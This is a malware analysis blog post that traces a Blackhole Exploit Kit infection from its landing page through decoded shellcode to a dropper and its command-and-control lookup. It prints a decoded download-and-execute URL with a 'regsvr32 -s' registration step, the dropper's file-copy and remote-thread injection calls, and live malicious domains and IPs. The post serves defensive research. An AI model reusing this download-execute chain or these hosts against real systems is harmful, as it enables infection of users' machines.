Slight changes detected in shellcode & dropper works of Blackhole Exploit Kit (landing page: 203.91.113.6 / mothership: 146.185.220.34)

Currently #MalwareMustDie is in hunting mode, so I joined the event. This is a report of the first case in hand, which is becoming an important matter in the investigation of BHEK.

I received a report of an infection, and after looking at a squid log I found the source,
which is 203.91.113.6 and is "suspected" of serving Blackhole.
I quoted that word because I am about 95% sure of it.

I had just arrived home from a 6-hour driving trip. After setting up FreeBSD for analysis mode
and setting up privoxy & tor, I aimed at the IP I mentioned previously.
The URL reported in the squid log doesn't seem to exist anymore;
it looks like the parameter was changed. It was:
h00p://bode-sales.net/w.php?f=9e4b3&e=2

I tried combinations of the latest possible Blackhole parameters and finally managed to
download the URL below (via tor only):
--21:26:28-- h00p://bode-sales.net/main.php?page=3c23940fb7350489
=> `main.php@page=3c23940fb7350489'
Resolving localhost (localhost)... 127.0.0.1, ::1
Connecting to localhost (localhost)|::1|:8118... connected.
Resolving bode-sales.net... 203.91.113.6
Connecting to bode-sales.net|203.91.113.6|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
[ <=> ] 68,856 40.80K/s
21:26:32 (40.74 KB/s) - `main.php' saved [68856]

GET /main.php?page=3c23940fb7350489 HTTP/1.0
User-Agent: MalwareMustDieDieDieee/666.666.666
Accept: */*
Host: bode-sales.net
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Sat, 15 Sep 2012 12:11:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.14

....(blah)

The file itself is the obvious BHEK landing page with obfuscated JS code;
for research purposes I neutralized it here:-->>[PASTEBIN]
After deobfuscating it I found the Plugin Detection of Blackhole,
which, also for research purposes, I neutralized here:-->>[PASTEBIN]

The first time I checked this landing page on VirusTotal the detection was ZERO; now:
MD5: 88ebe56bca027174ab28406ddbafa2e6
File size: 67.2 KB ( 68856 bytes )
File name: main.php
File type: HTML
Detection: 4 / 42
Analysis date: 2012-09-15 17:09:47 UTC ( 0 分 ago )
URL: ---------->>[VIRUS-TOTAL]

Malware Name:
McAfee : JS/Exploit-Blacole.gq
Symantec : Trojan.Malscript
McAfee-GW-Edition : JS/Exploit-Blacole.gq
Kaspersky : Trojan-Downloader.JS.Expack.adl

As previously reported in this blog-->[HERE], the exploit vector
of the plugin detect is basically unchanged,
and in our case now we have 6 (six) exploitations.
(The details are exactly as reported beforehand)
1. Java Object CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA (Gam.jar)-->[VT:1/9]
2. PDF File AcroPDF.PDF
3. DOMDocs Msxml2.XMLHTTP
4. Java Exploit javaplugin.191_40
5. Java webStart exploit JavaWebStart.isInstalled
*) I thought this time it was without the SWF Exploit infector.
A friend advised me and then I realized there is a
6. SWF Exploit (field.swf)-->[VT:20/42]

However, we have slight changes in the shellcode.
I am a big fan of shellzer, a PyDbg-based shellcode decoder, and
use it often in many of my projects.
We had a problem figuring out this blog's shellcode using shellzer,
so I cracked it manually. If some of you have the same problem,
I am sharing this howto as a reference:

The above infector exploit set has the mission
to execute the below shellcode:

FYI, shellzer hangs if you paste this code. I am not going into
the debugging details of WHY it hangs; let's focus on the
point and solve the code..

Let's dump all of the strings first, you'll get something like this:
iiiiN
..u4._3
d.@0.@
f.^<
t3,..
u..4$..uQ..LQV.u<.t5x
.V.v
@..;
u.^.^$
K.F.
....h
.......XPj@h
...P.
PU...^
.hon..hurlmT
...a
.r..
...\$
AQj.j.SWj.
j...
?.u.G
/p\X...JGLM.「IDM「.FM\._.X@X.N...K.I.M..((((

We can't tell what this is all about, except for what looks like an obfuscated URL
in the last line, so I scanned it and got the signatures & info below:
msf.fnstenv_mov: D9EED97424F45B817313
msf.jmp_call_additive: EB0C5E56311EAD01C3
msf.noupper: EB195E8BFE83C7008BD7
msf.shikata_ga_nai: DAD729C9B15AD97424F4
msf.single_static_bit: EB655E31ED83E10183E301
msf.countdown: FFC15E304C0E07E2FA
msf.call4_dw: FFC05E81760E
CCCCCC.xor: 434343434343EB0F5B33C966B9
77efe4.xor: 304500454975F9EB00
CCCC_INC_EBX_Slide: 43434343
XXXX_pop_eax_start: 58585858
7_push_PSQRVWU: 505351525657559CE8
push_user32: 68333200006855736572
push_urlmon: 686F6E00006875726C6D
push_shell32: 686C333200687368656C
edi_seh_k32: 33FF64FF37648927FF07EBE8
peb_k32: 64A1300000008B400C8B701C
hasher.ror7: 3AD67408C1CB0703DA40
E9Eb.hasher.rol3xor: C1C20332104080380075F5
didier.hll.template: 8945F868FA8B340068884E0D00E8080000008945FC

From this I guessed that the API methods of urlmon.dll and others
were used in the code.. but I couldn't detect any kernel32.dll API yet..
Let's skip it for a while.. Now it is time to bruteforce (bf) the code;
you can use any tools available and try some bf logic! :-)
Shortly, I got these interesting strings and fixed them:
h00p://bode-sales.net/w.php?f=56c7a&e=1
$regsvr32 -s $hwpbt$i.dll
*) where $h further leads to the temp dir strings &
$i leads to null values, so I put 0 in it.
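
The brute-force step described above, as an added example that is not part of the original post: it tries every single-byte XOR key over a blob and ranks the keys by the strings the analysis was looking for (a URL, urlmon, regsvr32). It assumes a one-byte XOR encoding; the sample blob, its key and the example.invalid URL are constructed, and the function names are hypothetical.

```python
import re

# Constructed sample, NOT the blob from this post: filler bytes, a DLL name and
# a placeholder URL, NUL-terminated, then XORed with one arbitrary byte.
_PLAIN = b"\x90\x90\xeb\x10urlmon\x00http://example.invalid/w.php?f=00000&e=1\x00\x00"
SAMPLE_KEY = 0x5A
SAMPLE_BLOB = bytes(b ^ SAMPLE_KEY for b in _PLAIN)

# Matched case-sensitively on purpose: key ^ 0x20 flips the case of letters,
# so a case-insensitive match would let two keys tie on "urlmon".
MARKERS = (b"http://", b"urlmon", b"regsvr32", b".dll")
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{5,}")


def xor_bytes(data, key):
    return bytes(b ^ key for b in data)


def printable_strings(data):
    """ASCII runs of 5+ printable characters, like strings(1) would report."""
    return [m.group().decode("ascii") for m in PRINTABLE_RUN.finditer(data)]


def brute_force(blob):
    """Score keys 1..255; return (marker_hits, printable_len, key, strings), best first."""
    scored = []
    for key in range(1, 256):
        decoded = xor_bytes(blob, key)
        found = printable_strings(decoded)
        hits = sum(1 for marker in MARKERS if marker in decoded)
        scored.append((hits, sum(len(s) for s in found), key, found))
    scored.sort(key=lambda c: (c[0], c[1]), reverse=True)
    return scored


def best_key(blob):
    """Return (key, strings) for the top candidate, or (None, []) if no marker decodes."""
    hits, _, key, found = brute_force(blob)[0]
    return (key, found) if hits else (None, [])


if __name__ == "__main__":
    key, found = best_key(SAMPLE_BLOB)
    print(hex(key), found)
```

Ranking by marker hits first and printable length second keeps a key that merely produces long runs of junk ASCII from outranking the key that decodes a real URL.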

The story is that urlmon.dll is being called to download
a malicious file from "h00p://bode-sales.net/w.php?f=56c7a&e=1",
save it as %Temp%wpbt0.dll, execute it, and register it with the "regsvr32 -s"
command on your PC. It looks like we have a slight change in the shellcode
API, in the usage of calls from non-kernel32.dll libraries.
This is the point of difference compared to the previous BHEK shellcode.
So let's see what the payload is (using tor), saving it the way the malware
scheme wants it.
--2012-09-15 20:47:08-- h00p://bode-sales.net/w.php?f=56c7a
Resolving localhost (localhost)... 127.0.0.1, ::1
Connecting to localhost (localhost)|::1|:8118... connected.
Proxy request sent, awaiting response... 200 OK
Length: 143207 (140K) [application/x-msdownload]
Saving to: `wpbt0.dll'
100%[======>] 143,207 44.5K/s in 3.1s
2012-09-15 20:47:13 (44.5 KB/s) - `wpbt0.dll' saved [143207/143207]

It is a PE binary with the below analysis:
Hexing first sector:
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 05 00 60 1C 53 50 00 00 00 00 PE..L...`.SP....
0090 00 00 00 00 E0 00 0F 01 0B 01 01 32 00 EC 00 00 ...........2....
00A0 00 42 00 00 00 00 00 00 00 10 00 00 00 10 00 00 .B..............
00B0 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 ......@.........
00C0 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 ................

↑Quickly reversing it to seek some clues:
[0x00000000:0x00400000]> d
0x00000000 (01) 4d DEC EBP
0x00000001 (01) 5a POP EDX
0x00000002 (01) 90 NOP
0x00000003 (02) 0003 ADD [EBX], AL
0x00000005 (02) 0000 ADD [EAX], AL
0x00000007 (03) 000400 ADD [EAX+EAX], AL
0x0000000a (02) 0000 ADD [EAX], AL
0x0000000c (01) ff DB 0xff
0x0000000d (02) ff00 INC DWORD [EAX]
0x0000000f (06) 00b8 00000000 ADD [EAX+0x0], BH
0x00000015 (02) 0000 ADD [EAX], AL
0x00000017 (03) 0040 00 ADD [EAX+0x0], AL
: :
----- tastes like a packer trace.. -----
0x00000034 (02) 0000 ADD [EAX], AL
0x00000036 (02) 0000 ADD [EAX], AL
0x00000038 (02) 0000 ADD [EAX], AL
0x0000003a (02) 0000 ADD [EAX], AL
0x0000003c (03) 8000 00 ADD BYTE [EAX], 0x0
0x0000003f (02) 000e ADD [ESI], CL
0x00000041 (01) 1f POP DS
0x00000042 (05) ba 0e00b409 MOV EDX, 0x9b4000e
0x00000047 (02) cd 21 INT 0x21
0x00000049 (05) b8 014ccd21 MOV EAX, 0x21cd4c01
0x0000004e (01) 54 PUSH ESP
0x0000004f (05) 68 69732070 PUSH 0x70207369
0x00000054 (02) 72 6f JB 0x000000c5 ; 1
: :
PE Summary
Entry Point: 0x1000 at section: .code
CRC Fail: Claimed: 0 Actual: 185076
Compile Time: 0x50531C60 [Fri Sep 14 12:00:32 2012 UTC] <== NEW!
Packer: PureBasic 4.x -> Neil Hodgson
Compiler: Microsoft Visual C++ 5/6
Sections:
.code 0x1000 0x2775 10240
.teXT 0x4000 0xc335 50176
.rdata 0x11000 0x1a0f 7168
.data 0x13000 0x1218 2560
.rsrc 0x15000 0x115c 4608

Auto reverse first block and ...got the loops :-P
[0x401000L] push 0x0
[0x401005L] push 0x413998
[0x40100aL] call 0x404070L
[0x40100fL] add esp 0xc
[0x401014L] push 0x0
:
loop
:
[0x401677L] call 0x4021b7L //a h*ll of a looper...anti-reverse trap, patch it!
[0x40167aL] fstp st0
[0x40167fL] fild [0x413a08]
[0x401681L] fmul [0x413040]
[0x401687L] sub esp 0x4
[0x40168dL] fstp [esp]

Calls:
Complete calls listed here:--->>[PASTEBIN]
With the calls summary as per below:
Get system env, opening /exec files(by original C code),
opening thread, using timer, bitmap object manipulation,
GUI operations, using winsock, creation of TLS, creation of semaphores

↑OK, it looks strange enough, so let's reverse it properly. I used radare2.
You can use anything you like; if you reverse it correctly
you'll find the below malicious API calls inside the
packed parts of the sample (tip: unpack it first):
CopyFileW
(lpExistingFileName: "%Temp%wpbt0.dll",
lpNewFileName: "%ApData%\KB00725031.exe",
bFailIfExists: 0x0)

CreateRemoteThread
(hProcess: 0x68,
lpThreadAttributes: 0x0,
dwStackSize: 0x0,
lpStartAddress: 0x12032f0,
lpParameter: 0x1200000,
dwCreationFlags: 0x0,
lpThreadId: 0x0)

So we have a self-copy operation and foreign memory injection here.
Let's use a sandbox to quickly confirm it:
Malicious Processes
1960 c:\test\sample.exe (wpbt0.dll)
328 c:\documents and settings\user\application data\kb00725031.exe

Yes, it dropped the malware kb00725031.exe - and somehow I remembered
seeing this filename a while ago. I searched & found it here --->>[LINK]
(The details of this drop are another story with a long history)
Let's continue.
VirusTotal showed these detections when I found the payload the 1st time:
AntiVir : TR/Buzus.HT.11
AhnLab-V3 : Trojan/Win32.Jorik
Sophos : Mal/EncPk-AFN
Emsisoft : Trojan.Win32.Jorik.Foreign.AMN!A2
Kaspersky : Trojan.Win32.Jorik.Foreign.aa
Microsoft : VirTool:Win32/CeeInject.gen!HT
Comodo : UnclassifiedMalware

Now it has become:
MD5: a70da3ce151ac0eb46e3a0d959cd0af3
File size: 139.9 KB ( 143207 bytes )
File name: wpbt0.dll
File type: Win32 EXE
Detection : 9 / 41
Analysis date: 2012-09-15 16:21:04 UTC ( 0 分 ago )
URL:-------->>>[CLICK/VIRUS-TOTAL]
Malware Name:
VIPRE : Trojan.Win32.Generic!BT (NEW)
AntiVir : TR/Buzus.HT.11 (NEW)
AhnLab-V3 : Trojan/Win32.Jorik
ESET-NOD32 : a variant of Win32/Injector.WNM (NEW)
Sophos : Mal/EncPk-AFN
Microsoft : VirTool:Win32/CeeInject.gen!HT
Symantec : Trojan.ADH.2 (NEW)
Emsisoft : Trojan.Win32.Jorik.Foreign.AMN!A2
Comodo : UnclassifiedMalware

Well, it is supposed to connect to the internet, so let's carefully run it a bit :-)
It works as expected, & starts to communicate with the mothership
at 146.185.220.34! Below is my record of the UDP traffic:
Req:
00000000 00 02 01 00 00 01 00 00 00 00 00 00 13 74 75 6e ........ .....tun
00000010 69 6e 67 6c 61 6d 62 6f 73 67 6c 61 6d 6f 75 72 inglambo sglamour
00000020 02 72 75 00 00 01 00 01 .ru.....

Ans:
00000000 00 02 81 80 00 01 00 01 00 00 00 00 13 74 75 6e ........ .....tun
00000010 69 6e 67 6c 61 6d 62 6f 73 67 6c 61 6d 6f 75 72 inglambo sglamour
00000020 02 72 75 00 00 01 00 01 c0 0c 00 01 00 01 00 00 .ru..... ........
00000030 0e 0f 00 04 92 b9 dc 22 ......."

Yes, it asked for
tuninglambosglamour.ru IN A // 146.185.220.34

I bet it does some more malicious stuff, as per the analysis referred to above.
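
Decoding the answer packet shown above, as an added example that is not part of the original post: a minimal DNS parser that follows the c0 0c compression pointer in the answer section and extracts the A record. The payload bytes are copied from the dump; the function names are hypothetical.

```python
import struct

# UDP payload of the answer, copied from the hex dump in the post.
ANSWER = bytes.fromhex(
    "0002818000010001000000001374756e"
    "696e676c616d626f73676c616d6f7572"
    "0272750000010001c00c000100010000"
    "0e0f000492b9dc22"
)


def read_name(msg, off):
    """Decode the name at off, following 0xC0 compression pointers.

    Returns (name, offset of the first byte after the name as stored in the record).
    """
    labels, resume, jumps = [], None, 0
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:
            if resume is None:
                resume = off + 2          # a pointer is 2 bytes and ends the name
            off = ((length & 0x3F) << 8) | msg[off + 1]
            jumps += 1
            if jumps > 16:                # malformed packets can point in a loop
                raise ValueError("DNS compression loop")
            continue
        off += 1
        if length == 0:
            return ".".join(labels), (off if resume is None else resume)
        labels.append(msg[off:off + length].decode("ascii"))
        off += length


def parse_a_records(msg):
    """Return (transaction id, is_response, [question names], [(name, ttl, ipv4)])."""
    ident, flags, qdcount, ancount = struct.unpack_from("!4H", msg, 0)
    off, questions, answers = 12, [], []
    for _ in range(qdcount):
        name, off = read_name(msg, off)
        questions.append(name)
        off += 4                          # skip QTYPE and QCLASS
    for _ in range(ancount):
        name, off = read_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack_from("!2HIH", msg, off)
        off += 10
        if rtype == 1 and rdlen == 4:     # A record
            answers.append((name, ttl, ".".join(str(b) for b in msg[off:off + 4])))
        off += rdlen
    return ident, bool(flags & 0x8000), questions, answers
```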

By the way the network info of the mothership:
inetnum: 146.185.220.0 - 146.185.220.255
netname: mdsru-net
descr: MDS LTD.
country: RU
org: ORG-Ml192-RIPE
admin-c: AV6782-RIPE
tech-c: VA2854-RIPE
status: ASSIGNED PA
mnt-by: mdsru-mnt
source: RIPE # Filtered

organisation: ORG-Ml192-RIPE
org-name: MDS ltd.
org-type: OTHER
abuse-mailbox: info@mdsnet.org
address: Sofia Kovalevsaja st. 22
address: 620242 Ekaterinburg
address: Russian Federation
mnt-ref: mdsru-mnt
admin-c: AV6782-RIPE
mnt-by: mdsru-mnt
source: RIPE # Filtered

person: Andrey Voronov
address: 1st Magistralny blind alley
address: 24, BC "The Yard"
address: Moskow
abuse-mailbox: info@mdsnet.org
address: Russian Federation
phone: +74957392422
nic-hdl: AV6782-RIPE
mnt-by: mdsru-mnt
source: RIPE # Filtered

person: Vlad Abramov
address: 1st Magistralny blind alley
address: 24, BC "The Yard"
address: Moskow
abuse-mailbox: info@mdsnet.org
address: Russia
phone: +74957392422
nic-hdl: VA2854-RIPE
mnt-by: mdsru-mnt
source: RIPE # Filtered

While the landing page is in this network:
inetnum: 203.91.112.0 - 203.91.119.255
netname: G-Mobile
descr: G-Mobile, Baga-Toiruu 3/9, Chingeltei district-1,
descr: Ulaanbaatar 211213, Mongolia
country: MN
admin-c: TG154-AP
tech-c: TG154-AP

route: 203.91.113.0/24
descr: G-Mobile Subnet
origin: AS24559
mnt-by: MAINT-MN-WIRELESSCOM
changed: tulga@g-mobile.mn 20090205
source: APNIC

person: Tulga Gandavaa
nic-hdl: TG154-AP
e-mail: tulga@g-mobile.mn
address: G-Mobile Corporation,
address: Chingeltei district 1st khoroo, Baga toiruu - 3/9
address: Ulaanbaatar, Mongolia
phone: +976-98101111
fax-no: +976-11-311195
country: MN
changed: tulga@g-mobile.mn 20070111
mnt-by: MAINT-MN-G-MOBILE


↑There are four more domains hosted on the same IP, so there will be a variety
of possible spam links to this infector.

This case's malware family photograph:

Conclusion:

The moral of this story is that the shellcode format of BHEK is starting to change.
The usual kernel32.dll API-based calls are becoming undetected, yet it
downloaded the dropper binary, which now contains the copy API.
It is a slight modification, but it successfully fools some
automation schemes. Further investigation made me realize the reason,
which is written up in "Bypassing Export address table Address Filter(EAF)",
which can be viewed--->>[HERE]
Additionally, a friend advised me of the crash PoC of it here -->>[HERE]

Maybe shellzer must be patched to handle this new type of shellcode.
I must say, maybe I missed something, since most of the reversing was done manually,
so I am sorry about that, and please advise me in the comment area.

I think some more changes in BHEK distribution are on the way too.
Let's keep our eyes on it and see what happens.
BTW, the infected URLs are all up and alive, so please be careful with them.
Malware MUST Die!!